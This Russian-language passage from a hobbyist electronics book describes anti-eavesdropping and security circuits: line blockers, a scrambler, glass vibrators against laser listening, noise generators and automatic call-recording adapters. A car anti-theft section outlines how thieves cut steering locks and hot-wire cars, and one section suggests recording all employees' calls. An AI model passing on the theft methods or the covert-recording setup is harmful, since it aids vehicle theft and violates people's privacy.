Для того, чтобы работа этого генератора не мешала анализу состояния линии, он периодически отключается путем переключения триггера DD1.2, DD1.3 на момент оценки состояния линии. Если в процессе оценки состояния линии принимается решение о том, что линия свободна от посторонних подключений, то схема автоматически устанавливается в исходное состояние и переходит в ждущий режим с периодической проверкой состояния линии.

Резисторы используются типа МЛТ-0,125. Диод VD1 можно заменить на КД105, Д226. Транзисторы можно заменить на КТ3102, КТ503. Микросхемы можно использовать из серий 564 и 1561. Конденсаторы С1, С2 и С3 должны быть с минимальным током утечки.

При настройке устройства устанавливается частота генераторов 0,51 Гц и 12-20 кГц резисторами R3 и R10, соответственно. При включенном генераторе DD2.3 резистором R14 устанавливается уровень напряжения в линии, равный 35-45 В, при котором еще не происходит рассоединение линии. Исходные уровни срабатывания рассматриваемого устройства устанавливаются резисторами R2 и R9.

Прибор необходимо подключать к линии с соблюдением полярности

Блокиратор параллельного телефона

Во многих офисах и квартирах телефонные аппараты подключяют параллельно к одной линии. Поэтому разговор между двумя абонентами легко может прослушать и третий. Чтобы исключить такую возможность, используют устройство, обычно именуемое блокиратором. Схема блокиратора приведена на рис. 3.14.

Принцип действия схемы, представленной на рис. 3.14, предельно прост. Допустим, что снята трубка с телефонного аппарата ТА2. В цепи задействованного аппарата ТА2 напряжение линии 60 В пробивает динистор VS2 типа К1-1102А н оно падает до 5-15 В. Этого напряжения недостаточно для пробоя линисторов VS1, VS3 или VS4 в цепях параллельных аппаратов. Последние оказываются практически отключенными от линии очень большим сопротивлением закрытых динисторов. Это будет продолжаться до тех пор, пока первый из снявших трубку (в нашем случае ТА2) не положит ее на рычаги. Эта же схема позволит избавиться и от такого недостатка, связанного с параллельным включением аппаратов, как "подзванивание" их при наборе номера.

Устройство не нуждается в настройке. При подключении необходимо соблюдать полярность напряжения питания.

Аналогичное по принципу действия устройство можно собрать на другой элементной базе по схеме, приведенной на рис. 3.15.

Устройство содержит два аналога динисторов. Диоды и тиристоры могут быть любыми с допустимым напряжением не менее 100 В и рассчитанными на ток до 0,1 А. Стабилитроны VD1 и VD3 могут быть на напряжение стабилизации от 5,6 до 20 В.

3-11.gif

Изображение: 

3-12.gif

Изображение: 

3-13.gif

Изображение: 

3-14.gif

Изображение: 

3-15.gif

Изображение: 

3.2.3. Криптографические методы и средства защиты

3.2.3. Криптографические методы и средства защиты

Кардинальной мерой предотвращения прослушивания телефонных разговоров является использование криптографических методов защиты информации. В настоящее время для защиты телефонных сообщений применяют два метода: преобразование аналоговых параметров речи и цифровое шифрование. Устройства, использующие эти методы, называются скремблерами.

При аналоговом скремблировании производится изменение характеристики исходного звукового сигнала таким образом, что результирующий сигнал становится неразборчивым, но занимает ту же частотную полосу. Это дает возможность без проблем передавать его по обычным телефонным каналам связи. При этом методе сигнал может подвергаться следующим преобразованиям:

  • частотная инверсия;
  • частотная перестановка;
  • временная перестановка.

При цифровом способе закрытия передаваемого сообщения непрерывный аналоговый сигнал предварительно преобразуется в цифровой вид. После чего шифрование сигнала происходит обычно с помощью сложной аппаратуры, зачастую с применением компьютеров.

Ниже приводится описание скремблера, использующего метод частотной инверсии. Этот метод давно и успешно применяется американскими полицейскими службами и обеспечивает эффективную защиту радио- и телефонных переговоров от постороннего прослушивания.

Частотно-инвертированный сигнал выделяется из нижней боковой полосы спектра балансного-преобразования звукового сигнала с над звуковой несущей. Две последовательные инверсии восстанавливают исходный сигнал. Устройство работает как кодер и декодер одновременно. Синхронизации двух скремблеров не требуется. Принципиальная схема такого скремблера приведена на рис. 3.16.

 

Это устройство состоит из тактового генератора на микросхеме DD2 типа К561ЛА7, вырабатывающего сигнал частотой 7 кГц, делителя-формирователя несущей 3,5 кГц на микросхеме DD3.1 типа К561ТМ2, аналогового коммутатора балансного модулятора на микросхеме DD4 типа K561KT3, входного полосового фильтра с полосой пропускания 300-3000 Гц на микросхеме DА1.1 типа К574УД2 и сумматора балансного модулятора с фильтром низкой частоты на микросхеме DА1.2. Подстройка частоты тактовых импульсов, а следовательно частоты несущей, производится многооборотным резистором R3.

На рис. 3.17 представлены спектры входного (а) и преобразованного (б) сигналов.

В пределах полосы частот 300-3000 Гц разборчивость речи после двух преобразований составляет не менее 65%.

3-16.gif

Изображение: 

3-17.gif

Изображение: 

3.3. Защита информации от утечки по оптическому каналу

3.3. Защита информации от утечки по оптическому каналу

Для скрытности проведения перехвата речевых сообщений из помещений могут быть использованы устройства, в которых передача информации осуществляется в оптическом диапазоне. Чаще всего используется невидимый для простого глаза инфракрасный диапазон излучения.

Наиболее сложными и дорогостоящими средствами дистанционного перехвата речи из помещений являются лазерные устройства. Принцип их действия заключается в посылке зондирующего луча в направлении источника звука и приеме этого луча после отражения от каких-либо предметов, например, оконных стекол, зеркал и т. д. Эти предметы вибрируют под действием окружающих звуков и модулируют своими колебаниями лазерный луч. Приняв отраженный от них луч, можно восстановить модулирующие колебания.

Исходя из этого, рассмотрим один из достаточно простых, но очень эффективных способов защиты от лазерных устройств. Он заключается в том, чтобы с помощью специальных устройств сделать амплитуду вибрации стекла много большей, чем вызванную голосом человека. При этом на приемной стороне возникают трудности в детектированип речевого сигнала. Ниже приведены схемы и описания некоторых подобных устройств.

Простейший модулятор оконного стекла

Этот модулятор прост в изготовлении, содержит минимальное количество деталей и не требует налаживания. Он позволяет передавать стеклу колебания частотой 50 Гц. И в этом заключается его недостаток, так как с помощью современных средств обработки сигналов возможно вырезать эту частоту из спектра речевого сигнала. Принципиальная схема устройства приведена на рис. 3.18

В качестве модулятора с частотой 50 Гц используется обычное малогабаритное реле постоянного тока Р1. Питается реле Р1 от сети переменного тока частотой 50 Гц и напряжением 220 В через понижающий трансформатор Т1. На выводы обмотки реле Р1 подается напряжение со вторичной обмотки трансформатора Т1, немного ниже порога срабатывания. В качестве трансформатора используется любой, желательно малогабаритный, понижающий трансформатор. Напряжение на обмотке II выбирается в зависимости от используемого реле. Реле Р1 может быть типа РЭС22, РЭС9 и им подобные. Корпус реле приклеивается к стеклу клеем "Момент" или аналогичным (рис. 3.19).

Если подходящего трансформатора подобрать не удалось, то можно воспользоваться бестрансформаторной схемой устройства приведенной на рис. 3.20.

Конденсатор С1 гасит излишек напряжения, он подбирается под определенную нагрузку. Его можно разместить прямо в штепсельной вилке. При монтаже необходимо помнить, что устройство не имеет гальванической развязки с питающей сетью.

Другой модулятор позволяет получать сигналы, которые имеют хаотический характер, т. к, частота следования импульсов не стабильна. Устройство представляет собой два генератора импульсов, частоты которых не стабилизированы и отличаются друг от друга. Оба генератора работают на общую нагрузку. Принципиальная схема модулятора приведена на рис. 3.21.

Питание устройства осуществляется от сети переменного тока напряжением 220 В. Напряжение питания снимается с делителя напряжения на резисторах R1-R3 и выпрямляется диодом VD1 типа КД102А. Выпрямленное напряжение сглаживается конденсатором С1. Так как конденсатор С1 имеет небольшую емкость, то напряжение питания имеет большие пульсации. Оба генератора импульсов собраны на транзисторной сборке VT1 типа К101КТ1Г, содержащей два идентичных транзистора VT1.1 и VT1.2. Микросборка представляет собой транзисторные прерыватели для коммутации слабых сигналов переменного и постоянного токов. Транзисторы микросборки имеют общий коллектор. Работают генераторы следующим образом. Через резисторы R5 и R6 происходит заряд конденсаторов С2 и С3, соответственно, от источника питания. При достижении на конденсаторах С2 и С3 напряжения пробоя транзисторов VT1.1 и VT1.2 последние открываются и происходит разряд конденсаторов через базовый переход транзистора VT2 типа КТЗО1. Это приводит к открыванию транзистора VT2 и короткие импульсы (щелчки, следующие с частотой в сотни герц) поступают на пьезокерамические излучатели ZQ1 и ZQ2. Период времени между импульсами постоянно изменяется, в связи с чем считывание информации со стекол в условиях апериодических акустических полей даже с использованием специальных фильтров сильно затруднено. Громкость звукового сигнала можно плавно регулировать резистором R4.

Транзистор VT2 можно заменить на КТ3102, КТ315. Пьезокерамические преобразователи могут быть любыми, их число может быть от одного до четырех. Диод VD1 можно заменить на КД105. Пьезоизлучатели наклеиваются в центре стекла внутренних рам и соединяются с генератором тонким проводом.

Модулятор на одной микросхеме

Этот модулятор тоже питается от сети переменного тока напряжением 220 В. Принципиальная схема модулятора приведена на рис. 3.22.

Напряжение сети гасится резисторами R1 и R2 и выпрямляется диодом VD1 типа КД102А. Конденсатор С1 уменьшает пульсации выпрямленного напряжения. Модулятор выполнен на одной микросхеме К561ЛЕ5. По своему схемному пострению он напоминает генератор качающей частоты или частотный модулятор. На элементах DD1.3 и DD1.4 собран управляющий генератор низкой частоты. С его выхода прямоугольные импульсы поступают на интегрирующую цепочку R5, С4. При этом конденсатор С4 то заряжается через резистор R5, те разряжается через него. Поэтому на конденсаторе С4 получается напряжение треугольной формы, которое используется для управления генератором на элементах DD1.1, DD1.2. Этот генератор собран по схеме симметричного мультивибратора. Конденсаторы С2 и С3 поочередно заряжаются через резисторы R3 и R4 от источника треугольно то напряжения. Поэтому на выходе генератора будет иметь место сигнал, частота которого "плавает" в области звуковых частот речевого диапазона. Поскольку питание генератора не стабилизировано, то это приводит к усложнению характера генерируемых сигналов. Нагрузкой генератора служат пьезокерамические излучатели ZQ1 и ZQ2 типа ЗП-1.

Микросхему DD1 можно заменить на К561ЛА7 и даже на К561ЛН1 , К561ЛН2, либо на микросхемы серий 564, 1561.

Излучатели ZQ1 и ZQ2 могут быть любыми, их, количество может быть от одного до четырех. Они могут быть соединены последовательно или параллельно-последовательно.

Устройство модуляции стекла на цифровых микросхемах

Данное устройство вызывает вибрацию стекла с различной частотой, тем самым устраняя основной недостаток простейшего модулятора. Оно выполнено на двух цифровых схемах 561 серии. В качестве вибропреобразователя используется пьезокерамический преобразователь. Принципиальная схема устройства приведена на рис. 3.23.

Модулятор собран на микросхемах К561ЛН2 и К561ИЕ8. Генератор тактовых импульсов собран на элементах DD1.1, DD1.2, резисторе R1 и конденсаторе С1 по схеме несимметричного мультивибратора. С выхода генератора тактовые импульсы поступают на вход счетчика DD2 типа К561ИЕ8. Эта микросхема имеет встроенный дешифратор, поэтому напряжение высокого уровня поочередно появляется на выходах счетчика в соответствии с количеством пришедших импульсов. Допустим, что после прихода очередного тактового импульса уровень логической единицы появился на выходе 2 микросхемы DD2 (выв. 4). На остальных выходах присутствует уровень логического нуля. Положительное напряжение начинает заряжать конденсатор С2 по цепи VD3, R4, R12. При достижении на конденсаторе С2 напряжения, достаточного для открывания транзистора VT1 типа КТЗ15, последний открывается, и на выходе элемента DD1.4 появляется уровень логического нуля. Конденсатор С2 быстро разряжается через диод VD11 типа КД522. Транзистор VT1 закрывается, и процесс заряда конденсатора С2 возобновляется по той же зарядной цепи. С приходом очередного тактового импульса уровень пол.ожительного напряжения появляется только на выходе 3 (выв. 7). Теперь конденсатор С2 заряжается по цепи VD4, К5, R12. Так как суммарное сопротивление этой цепи меньше, чем сопротивление цепи VD3, R4, R12, то заряд конденсатора С2 до напряжения открывания происходит быстрее. Частота импульсов на выходе этого управляемого генератора увеличивается. Прямоугольные импульсы поступают на вибронреобразователь ZQ1, выполненный на основе пьезокерамического преобразователя .

Микросхемы DD1 и DD2 можно заменить на аналогичные - серий 176, 564, 1561. Резисторы - типа МЛТ-0,125. Сопротивления резисторов R2-R11 могут быть любыми из интервала 10 ком - 1 МОм. Резисторы одинакового номинала лучше не использовать. Диоды VD1-VD11 могут быть любыми, например, КД521, Д9, Д18, КД510 и др. Транзистор VT1 можно заменить на КТ3102. Пьезокерамический преобразователь ZQ1 может быть любой, от игрушек или телефонных аппаратов. Питание устройства осуществляется от батарейки типа "Крона". Вибродатчик ZQ1 приклеивается на стекло клеем "Момент". Сигнал к нему подводится по проводам от элемента DD1.6.

Настройка заключается в установке частоты тактового генератора подбором конденсатора С1 или резистора R1. Частота тактовых импульсов выбирается около 2-3 Гц.

Количество генерируемых частот можно увеличить, если вместо микросхемы DD2 К561ИЕ8 использовать широко распространенную микросхему К561ИЕ10. Эта микросхема (рис. 3.24) содержит два двоичных четырехразрядных счетчика.

К выходам счетчиков подключаются резисторы R2-R9, их сопротивления могут быть также от 10 кОм до 1 МОм. Диоды VD1-VD10 из схемы исключаются. При подаче тактовых импульсов на вход СР микросхемы DD2.1 в точке соединения резисторов R2-R12 появляется, изменяющееся ступенчато, напряжение. Число градаций напряжения, а, следовательно, и число частот, можно варьировать путем использования определенного количества разрядов счетчика DD2.

3-18.gif

Изображение: 

3-19.gif

Изображение: 

3-20.gif

Изображение: 

3-21.gif

Изображение: 

3-22.gif

Изображение: 

3-23.gif

Изображение: 

3-24.gif

Изображение: 

3.4. Специальные устройства защиты информации

3.4. Специальные устройства защиты информации

Кроме вышеописанных устройств в системах защиты информации используются и многие другие устройства и приборы. К ним относятся такие устройства, как сетевые фильтры, исключающие возможность утечки информации по цепям источников питания; приборы, обеспечивающие автоматическую запись телефонных разговоров; акустические генераторы шума, маскирующие звуковой сигнал и многие другие, используемые, как правило, специалистами в этой области.

3.4.1. Защита питающих цепей радиоэлектронной аппаратуры

3.4.1. Защита питающих цепей радиоэлектронной аппаратуры

Сетевой фильтр

Сетевые фильтры обеспечивают защищенность электронного устройства не только от внешних помех, но и от разного рода сигналов, генерируемых устройствами, которые могут служить источником утечки информации.

К числу защищаемых устройств относят самую разнообразную аппаратуру: компьютеры, приемники диапазона длинных и средних волн, радиотрансляционные приемники и др. Сетевой фильтр включают между энергетической сетью и устройством потребителя.

На рис. 3.25 представлена принципиальная схема сетевого фильтра, рассчитанного на мощность нагрузки 100 Вт.

Он обеспечивает питание одновременно двух потребителей.

В данном фильтре использованы два способа подавления помех: фильтрация режекторным дросселем Др1, Др2 и экранирование сетевой обмотки трансформатора Т1 и выходной обмотки трансформатора Т2. Электростатическим экраном сетевой обмотки трансформатора Т1 и выходной обмотки трансформатора Т2 служат магнитопроводы и низковольтные обмотки трансформаторов, расположенные поверх высоковольтных и соединенные с общим проводом фильтрам устройств-потребителей. Так как направление намотки обмоток и индуктивность дросселей Др1 и Др2 одинаковы, а токи через обмотки Др1 и Др2 противофазны, то сумма магнитных полей этих обмоток равна нулю и результирующее сопротивление дросселей переменному току промышленной частоты равно активному сопротивлению обмоток. Следовательно, падение напряжение на дросселях Др1, Др2 практически равно нулю.

В устройстве использованы два готовых трансформатора Т1 и Т2 типа ТПП296-127/220-50. Режекторный дроссель Др1, Др2 выполнен на ферритовом кольцевом магнитопроводе марки М4000 размером К65х32х8. Две обмотки наматываются в два провода, одновременно, проводом МГШВ-0,5 и содержат по 20 витков каждая. Намотка должна быть в один слой. Марка феррита и размер сердечника могут быть другими, но индуктивность дросселей должна быть около 1,5 мГн. Конденсаторы С1 и С2 должны быть рассчитаны на напряжение более 400 В.

Рис. 3.25 Сетевой фильтр на два потребителя

Изображение: 

3.4.2. Устройство для автоматической записи телефонных разговоров

3.4.2. Устройство для автоматической записи телефонных разговоров

Телефонный адаптер

Для анализа утечки информации по открытым каналам телефонной связи необходимо иметь записи телефонных разговоров всех сотрудников фирмы. Прослушивание записей позволяет установить характер и источник утечки информации и сделать соответствующие выводы.

Для записи телефонных разговоров используются устройства, автоматически подключающие записывающие устройства при снятии трубки телефонного аппарата. Принципиальная схема такого телефонного адаптера представлена на рис. 3.26.

Когда телефонная трубка не поднята, в телефонной линии присутствует напряжение около 60 В. Через делитель, собранный на резисторах R1-R3, оно поступает на затвор полевого транзистора VT1 типа КП10ЗМ и запирает его. Это приводит к закрытию транзистора VT2 типа КТЗ15 и транзистора VT3 типа КТ814. Реле К1 типа РЭС22 обесточено и его контакты К1.1-К1.4 разомкнуты.

При поднятии телефонной трубки в линии устанавливается напряжение 5-15 В, что ведет к открыванию транзистора VT1 и, следовательно, транзисторов VT2 и VT3. Срабатывает реле К1, которое контактами К1.3 и К1.4 подает питание 220 В на магнитофон, предварительно включенный на запись, и одновременно контактами K1.1 и К1.2 подключает телефонную линию через конденсаторы С1 и С2 ко входу магнитофона. Начинается запись разговора на магнитофон. Запись прекращается после опускания телефонной трубки на рычаг телефонного аппарата. Конденсатор СЗ сглаживает пульсации и шумы, наводимые в линии, которые могут вызвать ложные срабатывания устройства.

При подключении устройства к линии необходимо соблюдать полярность питания. В устройстве можно использовать любой силовой трансформатор, понижающий напряжение до 12 В и рассчитанный на ток нагрузки более 0,1 А или готовый сетевой адаптер с теми же параметрами. Реле РЭС22 можно заменить на два реле типа РЭС9

Адаптер для диктофона

В настоящее время для записи звуковой информации широкое распространение получили импортные диктофоны со встроенной системой VОX, т.е. с системой управления голосом. Это позволяет более экономно расходовать пленку, т.к. при отсутствии сигнала двигатель диктофона выключен и потребление тока устройством минимально. Ниже приведены две схемы адаптеров для работы с диктофонами. Первая схема приведена на рис. 3.27.

Эта схема предельно проста, т. к. содержит всего одну деталь - трансформатор Т1, включаемый в разрыв линии. Трансформатор Т1 самодельный. Для его изготовления используется обмотка реле РЭС15 или РЭС49. Штатная обмотка реле выполняет роль II - обмотки трансформатора. Поверх нее намотана I - обмотка, которая содержит 400-500 витков провода ПЭВ 0,1. Витки обмотки скреплены клеем "Момент".

Адаптер подключается в разрыв любого из проводов линии без соблюдения полярности.

Вторая схема (рис. 3.28), в отличие от первой, не имеет трансформатора, что облегчает ее изготовление.

Ток, протекающий в линии при разговоре, проходит через резистор R1, вызывая на нем падение напряжения. Напряжение звуковой частоты проходит через конденсатор С1 и поступает на вход VОX диктофона. Для уменьшения высокочастотных наводок линии можно подключить конденсатор С2, обозначенный на схеме пунктирной линией.

3-26.gif

Изображение: 

3-27.gif

Изображение: 

3-28.gif

Изображение: 

3.4.3. Генераторы акустического шума

3.4.3. Генераторы акустического шума

Акустические генераторы шума используются для зашумления акустического диапазона в помещениях и в линиях связи, а также для оценки акустических свойств помещений.

Под "шумом" в узком смысле этого слова часто понимают так называемый белый шум, характеризующийся тем, что его амплитудный спектр распределен по нормальному закону, а спектральная плотность мощности постоянна для всех частот.

В более широком смысле под шумом, по ассоциации с акустикой. понимают помехи, представляющие собой смесь случайных и кратковременных периодических процессов. Кроме белого шума выделяют такие разновидности шума, как фликкер-шум и импульсный шум. В генераторах шума используется белый шум, так как даже современны ми способами обработки сигналов этот шум плохо отфильтровывает ся. Ниже приводятся несколько схем различных генераторов шума.

Генератор белого шума

Самым простым методом получения белого шума является использование шумящих электронных элементов (ламп, транзисторов, различных диодов) с усилением напряжения шума. Принципиальная схема несложного генератора шума приведена на рис. 3.29.

Источником шума является полупроводниковый диод - стабилитрон VD1 типа КС168, работающий в режиме лавинного пробоя при очень малом токе. Сила тока через стабилитрон VD1 составляет всего лишь около 100 мкА. Шум, как полезный сигнал, снимается с катода стабилитрона VD1 и через конденсатор С1 поступает на инвертирую щий вход операционного усилителя DA1 типа КР140УД1208. На не инвертирующий вход этого усилителя поступает напряжение смещения, равное половине напряжения питания с делителя напряжения выполненного на резисторах R2 и R3. Режим работы микросхемы определяется резистором R5, а коэффициент усиления - резистором R4. С нагрузки усилителя, переменного резистора R6 , усиленное напряжение шума поступает на усилитель мощности, выполненный на микросхеме DA2 типа К174ХА10. Работа этого усилителя подробно описана в главе 2. С выхода усилителя шумовой сигнал через конденсатор С4 поступает на малогабаритный широкополосный громкоговоритель В1. Уровень шума регулируется резистором R6.

Стабилитрон VD1 генерирует шум в широком диапазоне частот от единиц герц до десятков мегагерц. Однако на практике он ограничен АЧХ усилителя и громкоговорителя. Стабилитрон VD1 подбирается по максимальному уровню шума, так как стабилитроны представляют собой некалиброванный источник шума. Он может быть любым с напряжением стабилизации менее напряжения питания.

Микросхему DA1 можно заменить на КР1407УД2 или любой операционный усилитель с высокой граничной частотой коэффициента единичного усиления. Вместо усилителя на DA2 можно использовать любой УЗЧ.

Для получения калиброванного по уровню шума генератора используют специальные шумящие вакуумные диоды. Спектральная плотность мощности генерируемого шума пропорциональна анодному току диода. Широкое распространение получили шумовые диоды двух типов 2ДЗБ и 2Д2С. Первый генерирует шума полосе до 30 МГц, а второй - до 600 МГц. Принципиальная схема генератора шума на шумящих вакуумных диодах приведена на рис. 3.30.

Резистор R1 типа МЛТ-0,25. Резистор R2 проволочный, он используется совместно с диодом 2ДЗБ. Питание генератора осуществляется от специального блока, схема которого приведена на рис. 3.31.

Цифровой генератор шума

Цифровой шум представляет собой временной случайный процесс, близкий по своим свойствам к процессу физических шумов и называется поэтому псевдослучайным процессом. Цифровая последовательность двоичных символов в цифровых генераторах шума называется псевдослучайной последовательностью, представляющей собой последовательность прямоугольных импульсов псевдослучайной длительности с псевдослучайными интервалами между ними. Период повторения всей последовательности значительно превышает наибольший интервал между импульсами. Наиболее часто применяются последовательности максимальной длины - М-последовательности, которые формируются при помощи регистров сдвига и сумматоров по модулю 2, использующихся для получения сигнала обратной связи.

Принципиальная схема генератора шума с равномерной спектральной плотностью в рабочем диапазоне частот приведена на рис. 3.32.

Этот генератор шума содержит последовательный восьмиразрядный регистр сдвига, выполненный на микросхеме К561ИР2, сумматор по модулю 2 (DD2.1), тактовый генератор (DD2.3, DD2.4) и цепь запуска (DD2.2), выполненные на микросхеме К561ЛП2.

Тактовый генератор выполнен на элементах DD2.3 и DD2.4 по схеме мультивибратора. С выхода генератора последовательность прямоугольных импульсов с частотой следования около 100 кГц поступает на входы "С" регистров сдвига DD1.1 и DD1.2, образующих 8-разpядный pегистpа сдвига. Запись инфоpмации в pегистpа пpоисходит по входам "D". На вход "D" pегистpа DD1.1 сигнал поступает с элементa обратной связи сумматора по модулю 2 - DD2.1. При вккочении питания возможно состояние регистров, когда на всех выходах присутствуют низкие уровни. Так как в регистрах М-последовательности запрещено появление нулевой комбинации, то в схему введена цепь запуска генератора, выполненная на элементе DD2.2. При включении питания последний формирует на своем выходе уровень логической единицы, который выводит регистр из нулевого состояния. На дальнейшую работу генератора цепь запуска не оказывает никакого влияния. Сформированный псевдослучайный сигнал снимается с 8-го разряда регистра сдвига и поступает для дальнейшего усиления и излучения. Напряжение источника питания может быть от 3 до 15 В.

В устройстве использованы КМОП микросхемы серии 561, их можно заменить на микротомы серий К564, К1561 или К176. В последнем случае напряжение питания должно быть 9 В.

Правильно собранный генератор в налаживании не нуждается. Изменением тактовой частоты можно регулировать диапазон частот шума и интервал между спектральными составляющими для заданной неравномерности спектра.

3-29.gif

Изображение: 

3-30.gif

Изображение: 

3-31.gif

Изображение: 

3-32.gif

Изображение: 

5. Охранные устройства - практическая схемотехника

Охранные устройства

В разделе приводится описание ряда электронных устройств, которые могут использоваться совместно с любой промышленной или самостоятельно изготовленной системой охраны. Они предназначены для тех, кто хочет обеспечить надежную защиту своего имущества: автомобиля, квартиры и т.п.

Рост преступности и ограниченные возможности правоохранительных органов заставляют граждан самих заботиться о сохранности своей собственности и личной безопасности. .

Первая статья адресована автолюбителям, которые хотят установить одну из серийных сигнализаций. В ней приводятся практические рекомендации по выбору и простой способ повышения противоугонных свойств, применимый для любой системы охраны.

1. Эффективная противоугонная система для автомобиля

Эффективная противоугонная система для автомобиля

Многие автолюбители рано или поздно сталкиваются с проблемой защиты своего автомобиля от угона. Путей решения этой проблемы есть несколько:

использование механических противоугонных устройств;

установка электронных систем охраны;

применение электронных секреток и блокирующих узлов;

комплексная защита автомобиля, состоящая из комбинации выше перечисленных вариантов.

Рассмотрим более подробно перечисленные способы. Ведь чтобы грамотно защитить свой автомобиль, владелец должен знать не хуже угонщика, как его могут угнать и что необходимо именно для вашей марки. Иначе не спасет даже самая дорогая система охраны.

Механические устройства можно разделить в основном на два вида. Первый из которых это всевозможные блокираторы руля или

типа руль-педаль. Второй тип это замки на коробку переключения передач (КПП) и капот.

Что касается первого типа механических "противоугонных устройств", то они, несмотря на разрекламированность, привлекательный внешний вид и удобство эксплуатации, не выдерживают никакой критики с точки зрения выполнения своей основной задачи — защиты автомобиля от угона. Депо в том, что их довольно легко нейтрализовать.

Так, устройства отечественного производства традиционно изготавливаются из низкосортных сталей и их можно перепилить обычной ножовкой по металлу. Эта же задача решается и без физических усилий — ведь почти в любом фирменном магазине электроинструментов можно приобрести компактное устройство с автономным питанием под названием "арматурорез". Эти электрические кусачки помещаются в кармане куртки и способны за 10 секунд перекусить арматуру толщиной 10 мм (а сталь там не плохая). Заряда же встроенного аккумулятора достаточно для перекусывания чуть ли не полсотни подобных прутков.

Если же механическое блокирующее устройство изготовлено из хороших материалов, то угонщик может воспользоваться таким средством как жидкий азот. Это позволяет заморозить металл до такой степени, что он становится хрупким и раскапывается от удара молотком. Отметим также, что малообеспеченный вор (не имеющий хорошего инструмента) может просто перепилить руль, что довольно просто, а потом заменить его на новый.

Что же касается противоугонных устройств типа замков на КПП (MULT-L-LOCK) или на капот (HOOD-LOCK), то они тоже не лишены недостатков, хотя и выполняются из хороших материалов и имеют сложные замки. Одним из недостатков этих устройств является их относительно высокая цена. К примеру, MULT-L-LOCK с установкой стоит около $150, a HOOD-LOCK порядка $80. Не подвергая сомнению прочность и качество самих устройств, следует обратить внимание на то, что прочность элементов корпуса автомобиля, к которым крепятся эти устройства, вовсе не так высока как хотелось бы.

Что же можно сказать о таких средствах защиты автомобиля как серийные промышленные электронные противоугонные устройства? В установочных центрах и в розничной продаже их ассортимент достаточно большой, но несмотря на это изобилие, все их можно условно разделить на две категории. Это относительно недорогие и несложные устройства ценой до $100 и дорогие противоугонные системы известных в мире производителей ценой от $300. В промежутке между ними в основном стоят устройства с сервисными возможностями последних и противоугонными свойствами первых.

Что касается дорогих электронных систем, таких как CLIFFORD, BOCSH, BLACK BUG и др., то можно успокоить автомобилистов, желающих сэкономить на их установке. Установить противоугонную систему такого класса самостоятельно часто не представляется возможным, так как для этого нужно иметь специальные знания и, что самое главное, подробную инструкцию по установке, чего вы точно не получите. Например, в системе BLACK BUG в узлы, обеспечивающие блокировку, встраиваются специальные датчики с исполнительными устройствами, управление которыми выполняет центральный блок по штатной проводке автомобиля с помощью кодов, передаваемых на высокой частоте.

Если же вы решитесь установить сложные системы охраны в специализированном центре, что само по себе не дешево, то рискуете на весь срок эксплуатации автомобиля быть зависимым от тех, кто занимался установкой (хорошо, если еще и качественно), так как отремонтировать ее или хотя бы отключить в критической ситуации не всегда удастся.

Хочу особо обратить внимание тех автовладельцев, у кого в машине нет бортовой электроники, такой как электронный коммутатор, инжектор или хотя бы клапан ЭПХХ. Таких автомобилей пока все еще большинство, даже среди тех, что еще выпускаются промышленностью. В этом случае устанавливать на ваш автомобиль дорогостоящую противоугонную систему вообще не имеет смысла, так как деньги будут потрачены зря. Дело в том, что она просто не сможет реализовать своих потенциально больших противоугонных свойств. Вы в этом сможете сами убедиться, открыв капот. Из жизненно важных узлов автомобиля, необходимых для пуска двигателя и движения, вы можете заблокировать лишь стартер и катушку зажигания. Зная принцип работы двигателя, угнать такой автомобиль проще простого. Для этого даже не потребуется разбираться в хитросплетении ваших проводов. Угонщик сделает всего два прямых соединения: между клеммой "+" аккумулятора — катушкой зажигания и стартером.

Конечно, чтобы заглянуть под капот, потребуется сначала открыть двери, а при этом сработает сигнализация. Как легко открыть двери при помощи ..., знают многие (не буду описывать процесс угона более подробно, чтобы меня не обвинили в обучении этому делу).

Несмотря на то, что автомобиль начнет пищать на все лады и мигать всеми осветительными приборами и может даже послать вам сообщение на пейджер (некоторые противоугонные устройства это обеспечивают), взывая о помощи, все равно капот будет открыт. В этом случае отключить сирену не составит труда.

Все указанные выше операции делаются довольно быстро и со стороны будет очень похоже на то, что хозяин, забыв что сигнализация включена, полез в собственный автомобиль. Ну а дальше, как уже отмечалось — два соединения и вы теряете автомобиль.

По данным испытаний, проводимых одним из подразделений МВД среди отбывающих в тюрьме срок специалистов, опытному угонщику достаточно всего 20...30 с, чтобы завести отечественный автомобиль, даже не зная, какая система сигнализации там установлена.

Есть противоугонные системы, оборудованные радиомаяком, при помощи которого автомобиль после угона обнаруживается и задерживается службой ГИБДД. Данные системы возврата угнанного автомобиля при хорошо отлаженной системе с успехом используются на Западе. Статистика же применения таких устройств у нас в стране просто печальна — либо отказывает техника, либо же угнанную машину просто не хотят задерживать от греха подальше. По этой причине не только рассматривать более подробно, но даже называть такие системы нет никакого смысла.

Учитывая все выше сказанное, а также практику установки и эксплуатации охранной сигнализации, можно предложить следующее техническое решение для защиты вашего автомобиля от угона. Оно заключается в использовании комбинации устройств промышленного изготовления, с уникальным самодельным.

Как уже упоминалось, есть электронные противоугонные системы и подешевле, и, по моему мнению, более практичные. К ним можно отнести такие как RED SCORPIO, PRESTIGE, ALLIGATOR и др.. Все они в зависимости от комплектации и уровня сервиса стоят $50...100. Эти несложные устройства вы вполне сможете установить сами.

В качестве противоугонных средств в них обычно предлагается две цепи блокировки, т.е. можно заблокировать стартер и катушку зажигания, что, как отмечалось выше, хотя и малоэффективно, но все же время у угонщика отнимет.

Приобретя и установив относительно недорогую систему охраны, вы получите уровень сервиса, достаточный для отечественного автомобиля, и первый рубеж охраны. Существенно улучшить охрану можно при помощи установки несложного устройства — топливного клапана. Электрический бензоклапан — это электромагнит, который обеспечивает прохождение бензина от бензобака к двигателю только при подаче на него питающего напряжения (существуют также нормально открытые клапаны с закрыванием подачей напряжения, но их мы рассматривать не будем).

В принципе ничего нового в этом устройстве нет — оно серийно выпускается отечественной промышленностью под разными названиями, например "Сюрприз" (рис. 3.1) и представляет собой встраиваемый в разрыв цепи бензопровода блок (крепится к корпусу автомобиля). Его можно установить в труднодоступном и только вам известном месте. Но для включения бензоклапана в его комплект входит тумблер. Мало того, что при установке не хотелось бы портить сверлением какую-нибудь деталь кузова, но ведь и установить его нужно незаметно. Кроме того, место установки должно быть таким, чтобы вы могли включать и выключать тумблер незаметным движением. Ведь даже обычный дворовый хулиган, наблюдающий, как вы при запуске двигателя куда то лезете, способен определить место установки тумблера. А мест для его скрытого размещения довольно мало.

3-11.jpg

